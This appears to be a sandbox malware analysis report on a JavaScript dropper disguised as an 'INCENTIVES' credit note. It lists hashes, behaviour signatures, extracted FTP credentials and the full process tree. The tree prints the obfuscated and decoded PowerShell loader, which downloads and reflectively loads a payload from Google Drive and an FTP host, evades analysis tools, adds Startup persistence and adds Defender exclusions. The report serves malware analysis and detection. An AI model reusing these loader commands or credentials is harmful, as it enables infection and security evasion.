Overview

overview

10

Static

static

1

INCENTIVES...024.js

windows7-x64

10

INCENTIVES...024.js

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 20:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js

  • Size

    196KB

  • MD5

    0dfe5dafeec713de2d6449c7980ac842

  • SHA1

    61c9a5d13802e747a8feec2f88d3de52e32ca32c

  • SHA256

    380f33fdb8df5c4848c2e50bc34d232178acb50bde94c58c1076196f876e7859

  • SHA512

    ddda548c0ce78a29fa944312533dc01138a655e672af1bb5eb9c63823b0e3412b9c99ad4e643cf7916c6a57537bf8a55583f934b74c70fc68c9d6c19d4cb549a

  • SSDEEP

    3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+9DWXt+NWXt+NWXt+NWXt+NWXt+NWy:uz

Score
10/10
defense_evasiondiscoveryexecutionpersistence

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    mfnEdMDLnE@@1578

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 11 IoCs
    persistence
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + 'LAEEAVA' + [char]66 + 'pAGgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQASw' + [char]66 + '' + [char]66 + 'AFQAaQ' + [char]66 + 'oACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'wAG4Acg' + [char]66 + 'kAHkAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAaw' + [char]66 + 'sAGsAQQ' + [char]66 + 'FACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAaw' + [char]66 + 'sAGsAQQ' + [char]66 + 'FACAAKQAgAHsAJA' + [char]66 + 'wAG4Acg' + [char]66 + 'kAHkAIAA9ACAAKAAkAHAAbg' + [char]66 + 'yAGQAeQAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHAAbg' + [char]66 + 'yAGQAeQAgAD0AIAAoACQAcA' + [char]66 + 'uAHIAZA' + [char]66 + '5ACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcA' + [char]66 + 'uAHIAZA' + [char]66 + '5ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAEoAbg' + [char]66 + '5AGcAbAAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQASg' + [char]66 + 'uAHkAZw' + [char]66 + 'sACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAYQ' + [char]66 + '' + [char]66 + 'AEEASQ' + [char]66 + 'lACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAxAC4AdA' + [char]66 + '4AHQAJwApADsAIAAkAGMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUA' + [char]66 + 'TAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACAAKA' + [char]66 + 'DAG8Abg' + [char]66 + '2AGUAcg' + [char]66 + '0AFQAbwAtAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'lAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACAALQ' + [char]66 + '' + [char]66 + 'AHMAUA' + [char]66 + 'sAGEAaQ' + [char]66 + 'uAFQAZQ' + [char]66 + '4AHQAIAAtAEYAbw' + [char]66 + 'yAGMAZQAgAC0AUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAA5ACwAIAAxADAAMgAsACAAMQAxADAALAAgADYAOQAsACAAMQAwADAALAAgADcANwAsACAANgA4ACwAIAA3ADYALAAgADEAMQAwACwAIAA2ADkALAAgADYANAAsACAANgA0ACwAIAA0ADkALAAgADUAMwAsACAANQA1ACwAIAA1ADYAIAApACkAKQApACkAOwA7AEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lAC0AVw' + [char]66 + 'lAGIAUg' + [char]66 + 'lAHEAdQ' + [char]66 + 'lAHMAdAAgAC0AVQ' + [char]66 + 'SAEkAIAAkAGEAQQ' + [char]66 + '' + [char]66 + 'AEkAZQAgAC0ATw' + [char]66 + '1AHQARg' + [char]66 + 'pAGwAZQAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAALQ' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAAJA' + [char]66 + 'jAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAALQ' + [char]66 + 'VAHMAZQ' + [char]66 + 'CAGEAcw' + [char]66 + 'pAGMAUA' + [char]66 + 'hAHIAcw' + [char]66 + 'pAG4AZwAgADsAYw' + [char]66 + 'tAGQALg' + [char]66 + 'lAHgAZQAgAC8AYwAgADsAcA' + [char]66 + 'pAG4AZwAgADEAMgA3AC4AMAAuADAALgAxACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIAAtAGMAbw' + [char]66 + 'tAG0AYQ' + [char]66 + 'uAGQAIA' + [char]66 + '7ACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAPQAgACgAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'jAHoAcg' + [char]66 + 'sAGwAIAA9ACAAKAAgAEcAZQ' + [char]66 + '0AC0AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'lAG4AdAAgAC0AUA' + [char]66 + 'hAHQAaAAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAKQAgADsASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUALQ' + [char]66 + 'XAGUAYg' + [char]66 + 'SAGUAcQ' + [char]66 + '1AGUAcw' + [char]66 + '0ACAALQ' + [char]66 + 'VAFIASQAgACQAYw' + [char]66 + '6AHIAbA' + [char]66 + 'sACAALQ' + [char]66 + 'PAHUAdA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAAtAFUAcw' + [char]66 + 'lAEIAYQ' + [char]66 + 'zAGkAYw' + [char]66 + 'QAGEAcg' + [char]66 + 'zAGkAbg' + [char]66 + 'nAH0AIAA7ACQAcQ' + [char]66 + 'hAHEAeA' + [char]66 + 'FACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAFkARA' + [char]66 + 'LAGUAQgAgAC0ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAVQ' + [char]66 + 'UAEYAOAApACAAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAGQAQw' + [char]66 + 'pAFcAegAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHEAYQ' + [char]66 + 'xAHgARQAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApACAAOwAkAG4Aag' + [char]66 + 'jAGIAcQAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALgAnACAAOwAkAEwATA' + [char]66 + 'RAHUAZAAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcwAxACcAIAA7ACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAPQAgACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAIAA7AFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAG8AbQ' + [char]66 + 'hAGkAbg' + [char]66 + 'dADoAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAApAC4ARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJA' + [char]66 + 'uAGoAYw' + [char]66 + 'iAHEAIAArACAAJA' + [char]66 + 'MAEwAUQ' + [char]66 + '1AGQAIAApAC4ARw' + [char]66 + 'lAHQATQ' + [char]66 + 'lAHQAaA' + [char]66 + 'vAGQAKAAgACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAMAAvAGgANw' + [char]66 + 'SAEsASgAvAHIALw' + [char]66 + 'lAGUALg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAAsACAAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcALAAgACcARAAgAEQAMQ' + [char]66 + 'EAEEAZA' + [char]66 + 'kAEkAbg' + [char]66 + 'QAHIAbw' + [char]66 + 'jAGUAcw' + [char]66 + 'zADMAMgAnACAAKQAgACkAIAA7AH0AOwA=';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js') ;powershell $jPhaA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$KATih = $host.Version.Major.Equals(2);If ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$pnrdy = 'https://drive.google.com/uc?export=download&id=';$klkAE = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $klkAE ) {$pnrdy = ($pnrdy + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$pnrdy = ($pnrdy + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$qvkqf = ( New-Object Net.WebClient ) ;$qvkqf.Encoding = [System.Text.Encoding]::UTF8 ;$qvkqf.DownloadFile($pnrdy, ($HzOMj + '\Upwin.msu') ) ;$Jnygl = ( 'C:\Users\' + [Environment]::UserName );tkplB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js' -Destination ( $Jnygl + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$aAAIe = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt') ;$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt'); $credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));;Invoke-WebRequest -URI $aAAIe -OutFile $YDKeB -Credential $credential -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$czrll = ( Get-Content -Path $YDKeB ) ;Invoke-WebRequest -URI $czrll -OutFile $YDKeB -UseBasicParsing} ;$qaqxE = ( Get-Content -Path $YDKeB -Encoding UTF8) ;[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $qaqxE.Replace( '↓:↓' , 'A' ) ) ;$njcbq = 'ClassLibrary3.' ;$LLQud = 'Class1' ;$neUmV = 'prFVI' ;[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( $njcbq + $LLQud ).GetMethod( $neUmV ).Invoke($null, [object[]] ( '0/h7RKJ/r/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js', 'D D1DAddInProcess32' ) ) ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2080
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2348
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:736
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABZAEQASwBlAEIAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAGMAegByAGwAbAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABZAEQASwBlAEIAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJABjAHoAcgBsAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAFkARABLAGUAQgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4692
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4068
